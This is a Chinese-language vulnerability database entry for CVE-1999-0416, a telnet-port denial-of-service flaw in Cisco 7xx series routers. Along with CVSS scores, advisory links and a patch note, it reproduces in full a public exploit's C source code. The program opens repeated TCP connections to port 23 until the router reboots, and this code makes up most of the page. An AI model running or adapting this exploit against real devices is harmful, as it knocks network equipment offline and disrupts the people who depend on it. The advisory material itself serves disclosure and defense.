CVE-1999-0416
CVSS5.0
发布时间 :1999-03-11 00:00:00
修订时间 :2008-09-09 08:34:30
NMCOE    

[原文]Vulnerability in Cisco 7xx series routers allows a remote attacker to cause a system reload via a TCP connection to the router's TELNET port.


[CNNVD]Cisco漏洞(CNNVD-199903-035)

        Cisco 7xx系列存在漏洞。远程攻击者可以通过一个TCP连接至路由器TELNET端口导致系统再装入。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0416
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0416
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199903-035
(官方数据源) CNNVD

- 其它链接及资源

http://www.cisco.com/warp/public/770/7xxconn-pub.shtml
(UNKNOWN)  CISCO  19990311 Cisco 7xx TCP and HTTP Vulnerabilities
http://ciac.llnl.gov/ciac/bulletins/j-034.shtml
(UNKNOWN)  CIAC  J-034

- 漏洞信息

Cisco漏洞
中危 未知
1999-03-11 00:00:00 2005-07-27 00:00:00
远程  
        Cisco 7xx系列存在漏洞。远程攻击者可以通过一个TCP连接至路由器TELNET端口导致系统再装入。

- 公告与补丁

        

- 漏洞信息 (19919)

Cisco 7xx Series Router DoS Vulnerability (EDBID:19919)
hardware remote
1999-03-11 Verified
0 Tiz.Telesup
N/A [点击下载]
source: http://www.securityfocus.com/bid/1211/info

Opening approximately 98 connections on port 23 will cause Cisco 760 Series Routers to self reboot. Continuously repeating this action will result in a denial of service attack.

/* Cisco 760 Series Connection Overflow
 *
 *
 * Written by: Tiz.Telesup
 * Affected Systems: Routers Cisco 760 Series, I havn't tested anymore
 * Tested on: FreeBSD 4.0 and Linux RedHat 6.0
 */


#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


int     net_connect (struct sockaddr_in *cs, char *server,
        unsigned short int port, char *sourceip,
        unsigned short int sourceport, int sec);


void    net_write (int fd, const char *str, ...);


unsigned long int       net_resolve (char *host);



        
void
usage (void)
{
        printf ("usage: ./cisco host times\n");
        exit (EXIT_FAILURE);
}


int
main (int argc, char *argv[])
{


        char                    host[256];
        int                     port,times,count,sd = 0;
        int                     m = 0;
        struct sockaddr_in      cs;


        printf ("Cisco 760 series Connection Overflow.\n");
        printf ("-------------------------------------\n");
        
        if (argc < 3)
        usage();
        
        strcpy (host, argv[1]);
        times=atoi (argv[2]);
        
        if ((times < 1) || (times > 10000)) /*Maximum number of connections*/
                usage();



        port =23; /* This might be changed to the telnet port of the router*/
        


        printf ("Host: %s Times: %d\n", host, times);
        for (count=0;count<times;count++){
                printf ("Connecting... Connection number %d \n",count);
                fflush (stdout);
                sd = net_connect (&cs, host, port, NULL, 0, 30);


                if (sd < 1) {
                        printf ("failed!\n");
                        exit (EXIT_FAILURE);
                        }


        
                net_write (sd, "AAAA\n\n");


        }


        exit (EXIT_SUCCESS);
}


int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
                unsigned short int sourceport, int sec)
{
        int             n, len, error, flags;
        int             fd;
        struct timeval  tv;
        fd_set          rset, wset;


        /* first allocate a socket */
        cs->sin_family = AF_INET;
        cs->sin_port = htons (port);


        fd = socket (cs->sin_family, SOCK_STREAM, 0);
        if (fd == -1)
                return (-1);


        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
                close (fd);
                return (-1);
        }


        flags = fcntl (fd, F_GETFL, 0);
        if (flags == -1) {
                close (fd);
                return (-1);
        }
        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
        if (n == -1) {
                close (fd);
                return (-1);
        }


        error = 0;


        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
        if (n < 0) {
                if (errno != EINPROGRESS) {
                        close (fd);
                        return (-1);
                }
        }
        if (n == 0)
                goto done;


        FD_ZERO(&rset);
        FD_ZERO(&wset);
        FD_SET(fd, &rset);
        FD_SET(fd, &wset);
        tv.tv_sec = sec;
        tv.tv_usec = 0;


        n = select(fd + 1, &rset, &wset, NULL, &tv);
        if (n == 0) {
                close(fd);
                errno = ETIMEDOUT;
                return (-1);
        }
        if (n == -1)
                return (-1);


        if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
                if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
                        len = sizeof(error);
                        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
                                errno = ETIMEDOUT;
                                return (-1);
                        }
                        if (error == 0) {
                                goto done;
                        } else {
                                errno = error;
                                return (-1);
                        }
                }
        } else
                return (-1);


done:
        n = fcntl(fd, F_SETFL, flags);
        if (n == -1)
                return (-1);
        return (fd);
}


unsigned long int
net_resolve (char *host)
{
        long            i;
        struct hostent  *he;


        i = inet_addr(host);
        if (i == -1) {
                he = gethostbyname(host);
                if (he == NULL) {
                        return (0);
                } else {
                        return (*(unsigned long *) he->h_addr);
                }
        }
        return (i);
}


void
net_write (int fd, const char *str, ...)
{
        char    tmp[8192];
        va_list vl;
        int     i;


        va_start(vl, str);
        memset(tmp, 0, sizeof(tmp));
        i = vsnprintf(tmp, sizeof(tmp), str, vl);
        va_end(vl);


        send(fd, tmp, i, 0);
        return;
}		

- 漏洞信息

8894
Cisco 7xx Series Routers Telnet Service System Reload DoS
Remote / Network Access Denial of Service
Loss of Availability Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

1999-03-11 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Cisco has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站